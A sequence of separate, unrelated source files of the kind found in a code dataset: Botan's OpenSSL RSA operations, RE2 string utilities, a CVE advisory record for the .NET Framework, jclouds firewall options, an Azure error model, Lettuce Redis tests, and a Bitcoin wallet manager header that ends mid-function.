std::unique_ptr<RSA, std::function<void (RSA*)>> m_openssl_rsa;
};
class OpenSSL_RSA_Signing_Operation final : public PK_Ops::Signature_with_EMSA
{
public:
OpenSSL_RSA_Signing_Operation(const RSA_PrivateKey& rsa, const std::string& emsa) :
PK_Ops::Signature_with_EMSA(emsa, true),
m_openssl_rsa(nullptr, ::RSA_free)
{
const secure_vector<uint8_t> der = rsa.private_key_bits();
const uint8_t* der_ptr = der.data();
m_openssl_rsa.reset(d2i_RSAPrivateKey(nullptr, &der_ptr, der.size()));
if(!m_openssl_rsa)
throw OpenSSL_Error("d2i_RSAPrivateKey", ERR_get_error());
}
size_t signature_length() const override { return ::RSA_size(m_openssl_rsa.get()); }
secure_vector<uint8_t> raw_sign(const uint8_t msg[], size_t msg_len,
RandomNumberGenerator&) override
{
const size_t mod_sz = ::RSA_size(m_openssl_rsa.get());
if(msg_len > mod_sz)
throw Invalid_Argument("OpenSSL RSA sign input too large");
secure_vector<uint8_t> inbuf(mod_sz);
copy_mem(&inbuf[mod_sz - msg_len], msg, msg_len);
secure_vector<uint8_t> outbuf(mod_sz);
int rc = ::RSA_private_encrypt(static_cast<int>(inbuf.size()), inbuf.data(),
outbuf.data(),
m_openssl_rsa.get(), RSA_NO_PADDING);
if(rc < 0)
throw OpenSSL_Error("RSA_private_encrypt", ERR_get_error());
return outbuf;
}
size_t max_input_bits() const override
{
#if OPENSSL_VERSION_NUMBER < 0x10100000L
return ::BN_num_bits(m_openssl_rsa->n) - 1;
#else
return ::RSA_bits(m_openssl_rsa.get()) - 1;
#endif
}
private:
std::unique_ptr<RSA, std::function<void (RSA*)>> m_openssl_rsa;
};
}
std::unique_ptr<PK_Ops::Encryption>
make_openssl_rsa_enc_op(const RSA_PublicKey& key, const std::string& params)
{
auto pad_info = get_openssl_enc_pad(params);
return std::unique_ptr<PK_Ops::Encryption>(
new OpenSSL_RSA_Encryption_Operation(key, pad_info.first, pad_info.second));
}
std::unique_ptr<PK_Ops::Decryption>
make_openssl_rsa_dec_op(const RSA_PrivateKey& key, const std::string& params)
{
auto pad_info = get_openssl_enc_pad(params);
return std::make_unique<OpenSSL_RSA_Decryption_Operation>(key, pad_info.first);
}
std::unique_ptr<PK_Ops::Verification>
make_openssl_rsa_ver_op(const RSA_PublicKey& key, const std::string& params)
{
return std::make_unique<OpenSSL_RSA_Verification_Operation>(key, params);
}
std::unique_ptr<PK_Ops::Signature>
make_openssl_rsa_sig_op(const RSA_PrivateKey& key, const std::string& params)
{
return std::make_unique<OpenSSL_RSA_Signing_Operation>(key, params);
}
std::unique_ptr<RSA_PrivateKey>
make_openssl_rsa_private_key(RandomNumberGenerator& rng, size_t rsa_bits)
{
if (rsa_bits > INT_MAX)
throw Internal_Error("rsa_bits overflow");
secure_vector<uint8_t> seed(128);
rng.randomize(seed.data(), seed.size());
RAND_seed(seed.data(), static_cast<int>(seed.size()));
std::unique_ptr<BIGNUM, std::function<void (BIGNUM*)>> bn(BN_new(), BN_free);
if(!bn)
throw OpenSSL_Error("BN_new", ERR_get_error());
if(!BN_set_word(bn.get(), RSA_F4))
throw OpenSSL_Error("BN_set_word", ERR_get_error());
std::unique_ptr<RSA, std::function<void (RSA*)>> rsa(RSA_new(), RSA_free);
if(!rsa)
throw OpenSSL_Error("RSA_new", ERR_get_error());
if(!RSA_generate_key_ex(rsa.get(), static_cast<int>(rsa_bits), bn.get(), nullptr))
throw OpenSSL_Error("RSA_generate_key_ex", ERR_get_error());
uint8_t* der = nullptr;
int bytes = i2d_RSAPrivateKey(rsa.get(), &der);
if(bytes < 0)
throw OpenSSL_Error("i2d_RSAPrivateKey", ERR_get_error());
const secure_vector<uint8_t> keydata(der, der + bytes);
secure_scrub_memory(der, bytes);
std::free(der);
return std::unique_ptr<Botan::RSA_PrivateKey>
(new RSA_PrivateKey(AlgorithmIdentifier(), keydata));
}
}
#endif // BOTAN_HAS_RSA
| 5,120 |
772 | <filename>dashboard/config/programming_expressions/spritelab/codestudio_ifStatement.json
{
"category": "Logic",
"config": {
"docFunc": "codestudio_ifStatement",
"func": "controls_if_if"
}
} | 83 |
2,816 | // Copyright 2004 The RE2 Authors. All Rights Reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
#include "re2/stringpiece.h"
#include <ostream>
#include "util/util.h"
namespace duckdb_re2 {
const StringPiece::size_type StringPiece::npos; // initialized in stringpiece.h
StringPiece::size_type StringPiece::copy(char* buf, size_type n,
size_type pos) const {
size_type ret = std::min(size_ - pos, n);
memcpy(buf, data_ + pos, ret);
return ret;
}
StringPiece StringPiece::substr(size_type pos, size_type n) const {
if (pos > size_) pos = size_;
if (n > size_ - pos) n = size_ - pos;
return StringPiece(data_ + pos, n);
}
StringPiece::size_type StringPiece::find(const StringPiece& s,
size_type pos) const {
if (pos > size_) return npos;
const_pointer result = std::search(data_ + pos, data_ + size_,
s.data_, s.data_ + s.size_);
size_type xpos = result - data_;
return xpos + s.size_ <= size_ ? xpos : npos;
}
StringPiece::size_type StringPiece::find(char c, size_type pos) const {
if (size_ <= 0 || pos >= size_) return npos;
const_pointer result = std::find(data_ + pos, data_ + size_, c);
return result != data_ + size_ ? result - data_ : npos;
}
StringPiece::size_type StringPiece::rfind(const StringPiece& s,
size_type pos) const {
if (size_ < s.size_) return npos;
if (s.size_ == 0) return std::min(size_, pos);
const_pointer last = data_ + std::min(size_ - s.size_, pos) + s.size_;
const_pointer result = std::find_end(data_, last, s.data_, s.data_ + s.size_);
return result != last ? result - data_ : npos;
}
StringPiece::size_type StringPiece::rfind(char c, size_type pos) const {
if (size_ <= 0) return npos;
for (size_t i = std::min(pos + 1, size_); i != 0;) {
if (data_[--i] == c) return i;
}
return npos;
}
std::ostream& operator<<(std::ostream& o, const StringPiece& p) {
o.write(p.data(), p.size());
return o;
}
} // namespace duckdb_re2
| 913 |
892 | <gh_stars>100-1000
{
"schema_version": "1.2.0",
"id": "GHSA-cq62-c6vp-pfrh",
"modified": "2022-05-05T02:48:14Z",
"published": "2022-05-05T02:48:14Z",
"aliases": [
"CVE-2013-0004"
],
"details": "Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not properly validate the permissions of objects in memory, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application, aka \"Double Construction Vulnerability.\"",
"severity": [
],
"affected": [
],
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2013-0004"
},
{
"type": "WEB",
"url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2013/ms13-004"
},
{
"type": "WEB",
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A16339"
},
{
"type": "WEB",
"url": "http://www.us-cert.gov/cas/techalerts/TA13-008A.html"
}
],
"database_specific": {
"cwe_ids": [
"CWE-20"
],
"severity": "HIGH",
"github_reviewed": false
}
} | 552 |
324 | /*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.jclouds.googlecomputeengine.options;
import java.net.URI;
import java.util.List;
import org.jclouds.googlecomputeengine.domain.Firewall;
import com.google.common.collect.ImmutableList;
/**
* Options to insert a firewall.
*
* @see Firewall
*/
public class FirewallOptions {
private String name;
private URI network;
private String description;
private ImmutableList.Builder<String> sourceRanges = ImmutableList.builder();
private ImmutableList.Builder<String> sourceTags = ImmutableList.builder();
private ImmutableList.Builder<String> targetTags = ImmutableList.builder();
private ImmutableList.Builder<Firewall.Rule> allowed = ImmutableList.builder();
/**
* @see org.jclouds.googlecomputeengine.domain.Firewall#allowed()
*/
public List<Firewall.Rule> getAllowed() {
return allowed.build();
}
/**
* @see org.jclouds.googlecomputeengine.domain.Firewall#allowed()
*/
public FirewallOptions addAllowedRule(Firewall.Rule allowedRule) {
this.allowed.add(allowedRule);
return this;
}
/**
* @see org.jclouds.googlecomputeengine.domain.Firewall#allowed()
*/
public FirewallOptions allowedRules(List<Firewall.Rule> allowedRules) {
this.allowed = ImmutableList.builder();
this.allowed.addAll(allowedRules);
return this;
}
/**
* @see org.jclouds.googlecomputeengine.domain.Firewall#name()
*/
public FirewallOptions name(String name) {
this.name = name;
return this;
}
/**
* @see org.jclouds.googlecomputeengine.domain.Firewall#name()
*/
public String name() {
return name;
}
/**
* @see org.jclouds.googlecomputeengine.domain.Firewall#description()
*/
public FirewallOptions description(String description) {
this.description = description;
return this;
}
/**
* @see org.jclouds.googlecomputeengine.domain.Firewall#description()
*/
public String description() {
return description;
}
/**
* @see org.jclouds.googlecomputeengine.domain.Firewall#network()
*/
public FirewallOptions network(URI network) {
this.network = network;
return this;
}
/**
* @see org.jclouds.googlecomputeengine.domain.Firewall#network()
*/
public URI network() {
return network;
}
/**
* @see org.jclouds.googlecomputeengine.domain.Firewall#sourceRanges()
*/
public List<String> sourceRanges() {
return sourceRanges.build();
}
/**
* @see org.jclouds.googlecomputeengine.domain.Firewall#sourceRanges()
*/
public FirewallOptions addSourceRange(String sourceRange) {
this.sourceRanges.add(sourceRange);
return this;
}
/**
* @see org.jclouds.googlecomputeengine.domain.Firewall#sourceRanges()
*/
public FirewallOptions sourceRanges(Iterable<String> sourceRanges) {
this.sourceRanges = ImmutableList.builder();
this.sourceRanges.addAll(sourceRanges);
return this;
}
/**
* @see org.jclouds.googlecomputeengine.domain.Firewall#sourceTags()
*/
public List<String> sourceTags() {
return sourceTags.build();
}
/**
* @see org.jclouds.googlecomputeengine.domain.Firewall#sourceTags()
*/
public FirewallOptions addSourceTag(String sourceTag) {
this.sourceTags.add(sourceTag);
return this;
}
/**
* @see org.jclouds.googlecomputeengine.domain.Firewall#sourceTags()
*/
public FirewallOptions sourceTags(Iterable<String> sourceTags) {
this.sourceTags = ImmutableList.builder();
this.sourceTags.addAll(sourceTags);
return this;
}
/**
* @see org.jclouds.googlecomputeengine.domain.Firewall#targetTags()
*/
public List<String> targetTags() {
return targetTags.build();
}
/**
* @see org.jclouds.googlecomputeengine.domain.Firewall#targetTags()
*/
public FirewallOptions addTargetTag(String targetTag) {
this.targetTags.add(targetTag);
return this;
}
/**
* @see org.jclouds.googlecomputeengine.domain.Firewall#targetTags()
*/
public FirewallOptions targetTags(List<String> targetTags) {
this.targetTags = ImmutableList.builder();
this.targetTags.addAll(targetTags);
return this;
}
}
| 1,766 |
1,350 | // Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License.
// Code generated by Microsoft (R) AutoRest Code Generator.
package com.azure.messaging.servicebus.implementation.models;
import com.azure.core.annotation.Fluent;
import com.fasterxml.jackson.annotation.JsonProperty;
import com.fasterxml.jackson.dataformat.xml.annotation.JacksonXmlRootElement;
/** The ServiceBusManagementError model. */
@JacksonXmlRootElement(localName = "ServiceBusManagementError")
@Fluent
public final class ServiceBusManagementError {
/*
* The service error code.
*/
@JsonProperty(value = "Code")
private Integer code;
/*
* The service error message.
*/
@JsonProperty(value = "Detail")
private String detail;
/**
* Get the code property: The service error code.
*
* @return the code value.
*/
public Integer getCode() {
return this.code;
}
/**
* Set the code property: The service error code.
*
* @param code the code value to set.
* @return the ServiceBusManagementError object itself.
*/
public ServiceBusManagementError setCode(Integer code) {
this.code = code;
return this;
}
/**
* Get the detail property: The service error message.
*
* @return the detail value.
*/
public String getDetail() {
return this.detail;
}
/**
* Set the detail property: The service error message.
*
* @param detail the detail value to set.
* @return the ServiceBusManagementError object itself.
*/
public ServiceBusManagementError setDetail(String detail) {
this.detail = detail;
return this;
}
}
| 613 |
4,095 | /*
* Copyright 2011-2021 the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package io.lettuce.core;
import static io.lettuce.core.ClientOptions.DisconnectedBehavior.REJECT_COMMANDS;
import static io.lettuce.core.ScriptOutputType.INTEGER;
import static org.assertj.core.api.Assertions.assertThat;
import java.time.Duration;
import java.util.ArrayList;
import java.util.List;
import java.util.concurrent.CountDownLatch;
import java.util.concurrent.TimeUnit;
import javax.enterprise.inject.New;
import javax.inject.Inject;
import org.junit.jupiter.api.BeforeEach;
import org.junit.jupiter.api.Test;
import org.junit.jupiter.api.TestInstance;
import org.junit.jupiter.api.extension.ExtendWith;
import org.reactivestreams.Subscriber;
import org.reactivestreams.Subscription;
import reactor.core.publisher.Flux;
import reactor.core.publisher.Mono;
import reactor.test.StepVerifier;
import io.lettuce.core.api.StatefulRedisConnection;
import io.lettuce.core.api.reactive.RedisReactiveCommands;
import io.lettuce.core.api.sync.RedisCommands;
import io.lettuce.test.Delay;
import io.lettuce.test.LettuceExtension;
import io.lettuce.test.Wait;
import io.lettuce.test.WithPassword;
import io.lettuce.test.condition.EnabledOnCommand;
/**
* @author <NAME>
* @author <NAME>
* @author <NAME>
*/
@ExtendWith(LettuceExtension.class)
@TestInstance(TestInstance.Lifecycle.PER_CLASS)
class ReactiveConnectionIntegrationTests extends TestSupport {
private final StatefulRedisConnection<String, String> connection;
private final RedisCommands<String, String> redis;
private final RedisReactiveCommands<String, String> reactive;
@Inject
ReactiveConnectionIntegrationTests(StatefulRedisConnection<String, String> connection) {
this.connection = connection;
this.redis = connection.sync();
this.reactive = connection.reactive();
}
@BeforeEach
void setUp() {
this.connection.async().flushall();
}
@Test
void doNotFireCommandUntilObservation() {
RedisReactiveCommands<String, String> reactive = connection.reactive();
Mono<String> set = reactive.set(key, value);
Delay.delay(Duration.ofMillis(50));
assertThat(redis.get(key)).isNull();
set.subscribe();
Wait.untilEquals(value, () -> redis.get(key)).waitOrTimeout();
assertThat(redis.get(key)).isEqualTo(value);
}
@Test
void fireCommandAfterObserve() {
StepVerifier.create(reactive.set(key, value)).expectNext("OK").verifyComplete();
assertThat(redis.get(key)).isEqualTo(value);
}
@Test
void isOpen() {
assertThat(reactive.isOpen()).isTrue();
}
@Test
void getStatefulConnection() {
assertThat(reactive.getStatefulConnection()).isSameAs(connection);
}
@Test
@Inject
void testCancelCommand(@New StatefulRedisConnection<String, String> connection) {
RedisReactiveCommands<String, String> reactive = connection.reactive();
List<Object> result = new ArrayList<>();
reactive.clientPause(2000).subscribe();
Delay.delay(Duration.ofMillis(50));
reactive.set(key, value).subscribe(new CompletionSubscriber(result));
Delay.delay(Duration.ofMillis(50));
reactive.reset();
assertThat(result).isEmpty();
}
@Test
void testEcho() {
StepVerifier.create(reactive.echo("echo")).expectNext("echo").verifyComplete();
}
@Test
@Inject
void testMonoMultiCancel(@New StatefulRedisConnection<String, String> connection) {
RedisReactiveCommands<String, String> reactive = connection.reactive();
List<Object> result = new ArrayList<>();
reactive.clientPause(1000).subscribe();
Delay.delay(Duration.ofMillis(50));
Mono<String> set = reactive.set(key, value);
set.subscribe(new CompletionSubscriber(result));
set.subscribe(new CompletionSubscriber(result));
set.subscribe(new CompletionSubscriber(result));
Delay.delay(Duration.ofMillis(50));
reactive.reset();
assertThat(result).isEmpty();
}
@Test
@Inject
void testFluxCancel(@New StatefulRedisConnection<String, String> connection) {
RedisReactiveCommands<String, String> reactive = connection.reactive();
List<Object> result = new ArrayList<>();
reactive.clientPause(1000).subscribe();
Delay.delay(Duration.ofMillis(100));
Flux<KeyValue<String, String>> set = reactive.mget(key, value);
set.subscribe(new CompletionSubscriber(result));
set.subscribe(new CompletionSubscriber(result));
set.subscribe(new CompletionSubscriber(result));
Delay.delay(Duration.ofMillis(100));
reactive.reset();
assertThat(result).isEmpty();
}
@Test
void multiSubscribe() throws Exception {
CountDownLatch latch = new CountDownLatch(4);
reactive.set(key, "1").subscribe(s -> latch.countDown());
Mono<Long> incr = reactive.incr(key);
incr.subscribe(s -> latch.countDown());
incr.subscribe(s -> latch.countDown());
incr.subscribe(s -> latch.countDown());
latch.await();
Wait.untilEquals("4", () -> redis.get(key)).waitOrTimeout();
assertThat(redis.get(key)).isEqualTo("4");
}
@Test
@Inject
void transactional(RedisClient client) throws Exception {
final CountDownLatch sync = new CountDownLatch(1);
RedisReactiveCommands<String, String> reactive = client.connect().reactive();
reactive.multi().subscribe(multiResponse -> {
reactive.set(key, "1").subscribe();
reactive.incr(key).subscribe(getResponse -> {
sync.countDown();
});
reactive.exec().subscribe();
});
sync.await(5, TimeUnit.SECONDS);
String result = redis.get(key);
assertThat(result).isEqualTo("2");
reactive.getStatefulConnection().close();
}
@Test
void auth() {
WithPassword.enableAuthentication(this.connection.sync());
try {
StepVerifier.create(reactive.auth("error")).expectError().verify();
} finally {
WithPassword.disableAuthentication(this.connection.sync());
}
}
@Test
@EnabledOnCommand("ACL")
void authWithUsername() {
try {
StepVerifier.create(reactive.auth(username, "error")).expectNext("OK").verifyComplete();
WithPassword.enableAuthentication(this.connection.sync());
StepVerifier.create(reactive.auth(username, "error")).expectError().verify();
StepVerifier.create(reactive.auth(aclUsername, aclPasswd)).expectNext("OK").verifyComplete();
StepVerifier.create(reactive.auth(aclUsername, "error")).expectError().verify();
} finally {
WithPassword.disableAuthentication(this.connection.sync());
}
}
@Test
void subscriberCompletingWithExceptionShouldBeHandledSafely() {
StepVerifier.create(Flux.concat(reactive.set("keyA", "valueA"), reactive.set("keyB", "valueB"))).expectNextCount(2)
.verifyComplete();
reactive.get("keyA").subscribe(createSubscriberWithExceptionOnComplete());
reactive.get("keyA").subscribe(createSubscriberWithExceptionOnComplete());
StepVerifier.create(reactive.get("keyB")).expectNext("valueB").verifyComplete();
}
@Test
@Inject
void subscribeWithDisconnectedClient(RedisClient client) {
client.setOptions(ClientOptions.builder().disconnectedBehavior(REJECT_COMMANDS).autoReconnect(false).build());
StatefulRedisConnection<String, String> connection = client.connect();
connection.async().quit();
Wait.untilTrue(() -> !connection.isOpen()).waitOrTimeout();
StepVerifier.create(connection.reactive().ping()).consumeErrorWith(throwable -> {
assertThat(throwable).isInstanceOf(RedisException.class)
.hasMessageContaining("not connected. Commands are rejected");
}).verify();
connection.close();
}
@Test
@Inject
void publishOnSchedulerTest(RedisClient client) {
client.setOptions(ClientOptions.builder().publishOnScheduler(true).build());
RedisReactiveCommands<String, String> reactive = client.connect().reactive();
int counter = 0;
for (int i = 0; i < 1000; i++) {
if (reactive.eval("return 1", INTEGER).next().block() == null) {
counter++;
}
}
assertThat(counter).isZero();
reactive.getStatefulConnection().close();
}
private static Subscriber<String> createSubscriberWithExceptionOnComplete() {
return new Subscriber<String>() {
@Override
public void onSubscribe(Subscription s) {
s.request(1000);
}
@Override
public void onComplete() {
throw new RuntimeException("throwing something");
}
@Override
public void onError(Throwable e) {
}
@Override
public void onNext(String s) {
}
};
}
private static class CompletionSubscriber implements Subscriber<Object> {
private final List<Object> result;
CompletionSubscriber(List<Object> result) {
this.result = result;
}
@Override
public void onSubscribe(Subscription s) {
s.request(1000);
}
@Override
public void onComplete() {
result.add("completed");
}
@Override
public void onError(Throwable e) {
result.add(e);
}
@Override
public void onNext(Object o) {
result.add(o);
}
}
}
| 4,142 |
505 | <gh_stars>100-1000
////////////////////////////////////////////////////////////////////////////////
// //
// Copyright (C) 2016, goatpig //
// Distributed under the MIT license //
// See LICENSE-MIT or https://opensource.org/licenses/MIT //
// //
////////////////////////////////////////////////////////////////////////////////
#ifndef _WALLET_MANAGER_H
#define _WALLET_MANAGER_H
using namespace std;
#include <mutex>
#include <memory>
#include <string>
#include <map>
#include <iostream>
#include "log.h"
#include "Wallets.h"
#include "SwigClient.h"
#include "Signer.h"
#include "BlockDataManagerConfig.h"
#include "CoinSelection.h"
#include "Script.h"
enum AddressType
{
AddressType_P2PKH,
AddressType_P2SH_P2PK,
AddressType_P2SH_P2WPKH,
AddressType_Multisig
};
class WalletContainer;
////////////////////////////////////////////////////////////////////////////////
struct CoinSelectionInstance
{
private:
CoinSelection cs_;
map<unsigned, shared_ptr<ScriptRecipient> > recipients_;
UtxoSelection selection_;
WalletContainer* const walletContainer_;
vector<UTXO> state_utxoVec_;
uint64_t spendableBalance_;
private:
static void decorateUTXOs(WalletContainer* const, vector<UTXO>&);
static function<vector<UTXO>(uint64_t)> getFetchLambdaFromWalletContainer(
WalletContainer* const walletContainer);
static function<vector<UTXO>(uint64_t)> getFetchLambdaFromLockbox(
SwigClient::Lockbox* const, unsigned M, unsigned N);
uint64_t getSpendVal(void) const;
void checkSpendVal(uint64_t) const;
void addRecipient(unsigned, const BinaryData&, uint64_t);
static shared_ptr<ScriptRecipient> createRecipient(const BinaryData&, uint64_t);
void selectUTXOs(vector<UTXO>&, uint64_t fee, float fee_byte, unsigned flags);
public:
CoinSelectionInstance(WalletContainer* const walletContainer,
const vector<AddressBookEntry>& addrBook);
CoinSelectionInstance(SwigClient::Lockbox* const,
unsigned M, unsigned N,
unsigned blockHeight, uint64_t balance);
unsigned addRecipient(const BinaryData&, uint64_t);
void updateRecipient(unsigned, const BinaryData&, uint64_t);
void updateOpReturnRecipient(unsigned, const BinaryData&);
void removeRecipient(unsigned);
void resetRecipients(void);
void selectUTXOs(uint64_t fee, float fee_byte, unsigned flags);
void processCustomUtxoList(
const vector<BinaryData>& serializedUtxos,
uint64_t fee, float fee_byte,
unsigned flags);
void updateState(uint64_t fee, float fee_byte, unsigned flags);
uint64_t getFeeForMaxValUtxoVector(const vector<BinaryData>& serializedUtxos, float fee_byte);
uint64_t getFeeForMaxVal(float fee_byte);
size_t getSizeEstimate(void) const { return selection_.size_; }
vector<UTXO> getUtxoSelection(void) const { return selection_.utxoVec_; }
uint64_t getFlatFee(void) const { return selection_.fee_; }
float getFeeByte(void) const { return selection_.fee_byte_; }
bool isSW(void) const { return selection_.witnessSize_ != 0; }
void rethrow(void) { cs_.rethrow(); }
};
////////////////////////////////////////////////////////////////////////////////
class WalletContainer
{
friend class WalletManager;
friend class PythonSigner;
friend struct CoinSelectionInstance;
private:
const string id_;
shared_ptr<AssetWallet> wallet_;
shared_ptr<SwigClient::BtcWallet> swigWallet_;
function<SwigClient::BlockDataViewer&(void)> getBDVlambda_;
map<BinaryData, vector<uint64_t> > balanceMap_;
map<BinaryData, uint32_t> countMap_;
uint64_t totalBalance_ = 0;
uint64_t spendableBalance_ = 0;
uint64_t unconfirmedBalance_ = 0;
private:
WalletContainer(const string& id,
function<SwigClient::BlockDataViewer&(void)> bdvLbd) :
id_(id), getBDVlambda_(bdvLbd)
{}
void reset(void)
{
totalBalance_ = 0;
spendableBalance_ = 0;
unconfirmedBalance_ = 0;
balanceMap_.clear();
countMap_.clear();
}
protected:
//need this for unit test, but can't have it exposed to SWIG for backwards
//compatiblity with 2.x (because of the shared_ptr return type)
virtual shared_ptr<AssetWallet> getWalletPtr(void) const
{
return wallet_;
}
public:
void registerWithBDV(bool isNew);
vector<uint64_t> getBalancesAndCount(
uint32_t topBlockHeight, bool IGNOREZC)
{
auto&& balVec =
swigWallet_->getBalancesAndCount(topBlockHeight, IGNOREZC);
totalBalance_ = balVec[0];
spendableBalance_ = balVec[1];
unconfirmedBalance_ = balVec[2];
return balVec;
}
vector<UTXO> getSpendableTxOutListForValue(
uint64_t val = UINT64_MAX)
{
return swigWallet_->getSpendableTxOutListForValue(val);
}
vector<UTXO> getSpendableZCList(void)
{
return swigWallet_->getSpendableZCList();
}
vector<UTXO> getRBFTxOutList(void)
{
return swigWallet_->getRBFTxOutList();
}
const map<BinaryData, uint32_t>& getAddrTxnCountsFromDB(void)
{
bool updateWallet = false;
auto&& countmap = swigWallet_->getAddrTxnCountsFromDB();
for (auto count : countmap)
{
if (count.first.getSize() == 0)
continue;
//save count
countMap_[count.first] = count.second;
//fetch the asset in wallet
auto assetIndex = wallet_->getAssetIndexForAddr(count.first);
auto asset = wallet_->getAssetForIndex(assetIndex);
auto hashType = asset->getAddressTypeForHash(
count.first.getSliceRef(1, count.first.getSize() - 1));
updateWallet |= asset->setAddressEntryType(hashType);
}
if (updateWallet)
wallet_->update();
return countMap_;
}
const map<BinaryData, vector<uint64_t> >& getAddrBalancesFromDB(void)
{
auto&& balancemap = swigWallet_->getAddrBalancesFromDB();
for (auto& balVec : balancemap)
{
if (balVec.first.getSize() == 0)
continue;
//save balance
balanceMap_[balVec.first] = balVec.second;
}
return balanceMap_;
}
vector<LedgerEntryData> getHistoryPage(uint32_t id)
{
return swigWallet_->getHistoryPage(id);
}
LedgerEntryData getLedgerEntryForTxHash(
const BinaryData& txhash)
{
return swigWallet_->getLedgerEntryForTxHash(txhash);
}
SwigClient::ScrAddrObj getScrAddrObjByKey(const BinaryData& scrAddr,
uint64_t full, uint64_t spendable, uint64_t unconf, uint32_t count)
{
return swigWallet_->getScrAddrObjByKey(
scrAddr, full, spendable, unconf, count);
}
vector<AddressBookEntry> createAddressBook(void) const
{
if (swigWallet_ == nullptr)
return vector<AddressBookEntry>();
return swigWallet_->createAddressBook();
}
BinaryData getNestedSWAddrForIndex(unsigned chainIndex)
{
return wallet_->getNestedSWAddrForIndex(chainIndex);
}
BinaryData getNestedP2PKAddrForIndex(unsigned chainIndex)
{
return wallet_->getNestedP2PKAddrForIndex(chainIndex);
}
BinaryData getP2PKHAddrForIndex(unsigned chainIndex)
{
return wallet_->getP2PKHAddrForIndex(chainIndex);
}
void extendAddressChain(unsigned count)
{
wallet_->extendChain(count);
}
bool extendAddressChainTo(unsigned count)
{
return wallet_->extendChainTo(count);
}
int getLastComputedIndex(void) const
{
return wallet_->getLastComputedIndex();
}
bool hasScrAddr(const BinaryData& scrAddr)
{
return wallet_->hasScrAddr(scrAddr);
}
int getAssetIndexForAddr(const BinaryData& scrAddr)
{
return wallet_->getAssetIndexForAddr(scrAddr);
}
const BinaryData& getP2SHScriptForHash(const BinaryData& script)
{
return wallet_->getP2SHScriptForHash(script);
}
AddressType getAddrTypeForIndex(int index)
{
auto addrType = wallet_->getAddrTypeForIndex(index);
AddressType type;
switch (addrType)
{
case AddressEntryType_P2PKH:
type = AddressType_P2PKH;
break;
case AddressEntryType_Nested_Multisig:
case AddressEntryType_Nested_P2WSH:
type = AddressType_Multisig;
break;
case AddressEntryType_Nested_P2WPKH:
type = AddressType_P2SH_P2WPKH;
break;
case AddressEntryType_Nested_P2PK:
type = AddressType_P2SH_P2PK;
break;
default:
throw WalletException("invalid address type");
}
return type;
}
AddressType getAddrTypeForIndex_WithScript(int index, const BinaryData& h160)
{
auto addrType = wallet_->getAddrTypeForIndex(index, h160);
AddressType type;
switch (addrType)
{
case AddressEntryType_P2PKH:
type = AddressType_P2PKH;
break;
case AddressEntryType_Nested_Multisig:
case AddressEntryType_Nested_P2WSH:
type = AddressType_Multisig;
break;
case AddressEntryType_Nested_P2WPKH:
type = AddressType_P2SH_P2WPKH;
break;
case AddressEntryType_Nested_P2PK:
type = AddressType_P2SH_P2PK;
break;
default:
throw WalletException("invalid address type");
}
return type;
}
SwigClient::ScrAddrObj getAddrObjByIndex(int index)
{
auto addrPtr = wallet_->getAddressEntryForIndex(index);
uint64_t full = 0, spend = 0, unconf = 0;
auto balanceIter = balanceMap_.find(addrPtr->getPrefixedHash());
if (balanceIter != balanceMap_.end())
{
full = balanceIter->second[0];
spend = balanceIter->second[1];
unconf = balanceIter->second[2];
}
uint32_t count = 0;
auto countIter = countMap_.find(addrPtr->getPrefixedHash());
if (countIter != countMap_.end())
count = countIter->second;
if (swigWallet_ != nullptr)
{
SwigClient::ScrAddrObj saObj(
swigWallet_.get(), addrPtr->getAddress(), index,
full, spend, unconf, count);
saObj.addrHash_ = addrPtr->getPrefixedHash();
return saObj;
}
else
{
SwigClient::ScrAddrObj saObj(
addrPtr->getAddress(), addrPtr->getPrefixedHash(), index);
return saObj;
}
}
SwigClient::ScrAddrObj getImportAddrObjByIndex(int index)
{
auto importIndex = AssetWallet::convertToImportIndex(index);
return getAddrObjByIndex(importIndex);
}
int detectHighestUsedIndex(void);
CoinSelectionInstance getCoinSelectionInstance(void)
{
auto&& addrBookVector = createAddressBook();
return CoinSelectionInstance(this, addrBookVector);
}
unsigned getTopBlock(void);
bool setImport(int importID, const SecureBinaryData& pubkey);
int convertToImportIndex(int);
int convertFromImportIndex(int);
void removeAddressBulk(const vector<BinaryData>&);
vector<BinaryData> getScriptHashVectorForIndex(int) const;
};
class ResolverFeed_PythonWalletSingle;
////////////////////////////////////////////////////////////////////////////////
class PythonSigner
{
friend class ResolverFeed_PythonWalletSingle;
private:
shared_ptr<AssetWallet> walletPtr_;
protected:
unique_ptr<Signer> signer_;
shared_ptr<ResolverFeed_PythonWalletSingle> feedPtr_;
public:
PythonSigner(WalletContainer& wltContainer)
{
walletPtr_ = wltContainer.wallet_;
signer_ = make_unique<Signer>();
signer_->setFlags(SCRIPT_VERIFY_SEGWIT);
//create feed
auto walletSingle = dynamic_pointer_cast<AssetWallet_Single>(walletPtr_);
if (walletSingle == nullptr)
throw WalletException("unexpected wallet type");
feedPtr_ = make_shared<ResolverFeed_PythonWalletSingle>(
walletSingle, this);
}
virtual void addSpender(
uint64_t value,
uint32_t height, uint16_t txindex, uint16_t outputIndex,
const BinaryData& txHash, const BinaryData& script, unsigned sequence)
{
